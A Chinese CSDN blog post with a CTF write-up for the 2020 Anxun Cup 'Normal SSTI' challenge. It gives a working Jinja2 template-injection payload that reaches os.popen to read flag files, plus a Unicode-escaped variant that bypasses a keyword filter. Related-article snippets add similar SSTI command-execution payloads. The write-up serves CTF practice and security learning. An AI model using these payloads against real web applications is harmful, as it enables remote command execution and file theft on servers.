[安洵杯 2020]Normal SSTI Unicode编码绕过waf

最新推荐文章于 2024-06-12 11:59:04 发布
最新推荐文章于 2024-06-12 11:59:04 发布
阅读量237 收藏
点赞数
分类专栏: NSSCTF 文章标签: java 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134164472
版权

这道题已经是很明显的ssti了

然后过滤了 {{}}

我们使用{%%}

然后过滤了许多关键词 但是我们可以使用 Unicode编码绕过 配合上 attr

{%print(lipsum|attr("__globals__")|attr("__getitem__")("os")|attr(popen)("cat /f*")|attr("read")())%}

然后我们需要把特殊替换 命令替换

{%print(lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("\u006f\u0073")|attr("\u0070\u006f\u0070\u0065\u006e")("\u0063\u0061\u0074\u0020\u002f\u0066\u002a")|attr("read")())%}

即可

或者fenjing一把梭哈即可

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[安洵 2020]Normal SSTI详细解法(Unicode编码绕过
2301_76690905的博客
11-07 401
引用popen,查目录url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22)|attr(%22\u0067\u0065\u0074%22)(%22os%22)|attr(%22\u0070\u006f\u0070\u0065\u006e%22)(%22\u006c\u0073\u0020\u002f%22)|等效于{{””.__class__}}
2020安洵部分WP —— 没人比我更懂签到题和问卷题队伍
晚安這個未知的世界
11-26 2378
前言 这次参加2020安洵CTF,感觉题目都并不是很难,除了web题,但是要狠狠的吐槽这个平台,太无语了,一直挂一直掉,提交flag一直卡,时不时网站直接404,简直无语了,下次这样就不想打了,没心情打。还好,第一次参加这个比赛取得了第32名的名次,虽然没有进前十,不过都尽力了,毕竟我太菜了,继续加油,争取下次打进线下。 MISC——签到 题目附件是一个jpg的二维码,扫码关注微信公众号 打开word文档把里面的 打开word文档把里面的表情解码一下就获得flag 解码网站http://www
web SSTI 刷题记录
rev1ve的博客
08-26 570
SSTI模板注入 刷题记录 [CISCN 2019华东南]Web11,[HDCTF 2023]SearchMaster,[HNCTF 2022 WEEK2]ez_SSTI
2020安洵参赛感言
Y5neKO's blog
09-07 182
感言前几天有幸参加了在成信大举办的安洵,首先感谢大佬们带我起飞(虽说大佬们也带不动我,我太菜了555)。经过这次比赛学到了很多,最重要的还是清楚了自己的真正水平,不会再像以前一样膨胀,希望自己也能在接下来的学习道路上戒骄戒躁,稳步前行。本次题目涉及到的题目的Writeup以及知识点总结将会在后面逐步更新,因Web题以及内网渗透环境的原因,Writeup会视情况在环境...
2020 第三届安洵 MISC Writeup
末初的CSDN博客
11-26 4380
题目名称签到王牌特工套娃BeCare4 这次安洵的Misc挺容易的,我这个菜鸡都差点AK了。。。可见难度很一般 签到 Hint: 哥哥们注意文件名 大声说出fl4g.jpg 向公众号回复:fl4g 下载是flag.docx 复制那串特殊符号到记事本 Emojiencode:http://www.atoolbox.net/Tool.php?Id=937 D0g3{Welc0m_ANd_H1T_liGht1y} 王牌特工 file查看,发现是ext3文件系统,直接挂载 使用Vera
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
SSTI
03-09
SSTI
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
BUUCTF web(七)
m0_46616663的博客
11-25 1542
[BJDCTF2020]Cookie is so stable hint里面 抓包看看 猜测这里可能是SSTI,但是试了几个命令都不行 整不会了,看了别的师傅的wp payload: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 参考:https://blog.csdn.net/weixin_44477223/article/details/115673318 [AS
2020安洵】EasyCM WriteUp
古月浪子的博客
12-17 475
这题从早上9点开始,做了快3小时,最后被人领先8分钟拿了一血,只拿到一个二血,呜呜呜/(ㄒoㄒ)/~~ 这题IDA有点白给,直接上x32dbg动调 可以看到要比较的字符串 我输入的是111d0g,经过某种加密以后变成了OOOBhKaT 前面有判断输入是不是3的倍数,不是则用-补齐的操作 推测是3位一组,一组输出4个字符,有点像base64 加密操作在这个函数里,会调用length/3次,每次输出4个字符 这个函数是动态解密的,而且dump下来后idapython写IDA里patch后也没法F5,懒得修花
简单的项目部署脚本(转载)
u010230019的博客
06-09 635
有些项目团队喜欢使用docker启动java服务,那么我们同样可以将上述脚本稍做改造,来实现基于shell+docker的简单项目部署能力。可以将核心节点的错误或者失败内容通过webhook发送到对应的告警平台,比如钉钉、飞书机器人等。把~/.ssh/id_rsa.pub内容添加到远程仓库的ssh秘钥中。执行start.sh脚本打包部署。start.sh脚本内容。
Java——简单图书管理系统
m0_74100417的博客
06-09 1378
数据类型变量iffor数组方法类和对象封装继承多态抽象类和接口今天就是把上述知识点全部都用起来 图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理
修改菜品——后端Java
weixin_53717695的博客
06-09 442
修改菜品——后端Java
Javascript)AI数字人mp4转canvas播放并去除背景绿幕
最新发布
lx_nhs的博客
06-12 438
去除前:去除后: 3、可能会出现的报错 (1)视频路径跨域问题:解决:vue开启代理
Java02】Java中数组的定义与初始化
饮冰室
06-10 536
推荐第一种方式。这种方式容易让人理解,数据类型是type[],对象名称是arrayName。第二种方式有些老旧了。由于数组是一种引用变量(也就是一个指针),所以定义的时候还没有指向任何有效的内存空间,因此在定义数组的时候不能指定数组的长度,也不能直接使用。必须进行初始化。可以使用var让系统自动推断变量类型,既可以用于静态初始化,也可以用于动态初始化。
【2024最新华为OD-C/D卷试题汇总】[支持在线评测] CPU算力分配(100分) - 三语言AC题解(Python/Java/Cpp)
清隆学长的博客
06-11 296
### 问题描述 K小姐是某公司运营部门的主管,最近她需要对公司的两组服务器进行算力分配。每组服务器有多个算力不同的 $CPU$,其中 $A$ 组第 $i$ 个 $CPU$ 的运算能力为 $A[i]$,而 $B$ 组第 $i$ 个 $CPU$ 的运算能力为 $B[i]$。一组服务器的总算力是各 $CPU$ 的算力之和。 为了让两组服务器的算力相等,K小姐允许从每组各选出一个 $CPU$ 进行一次交换。她希望从 $A$ 组服务器中选出算力尽可能小的 $CPU$ 来交换,你能帮她计算出应该选择哪两个 $CP
exploit ssti bypass filter
10-18
但是,黑客们经常寻找绕过这些过滤器的方法,以成功进行SSTI攻击。 要绕过SSTI过滤器,黑客可能会尝试以下方法: 1. 文件包含漏洞利用: 黑客可能会通过包含恶意文件来执行服务器端代码。他们可以将恶意代码写入可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值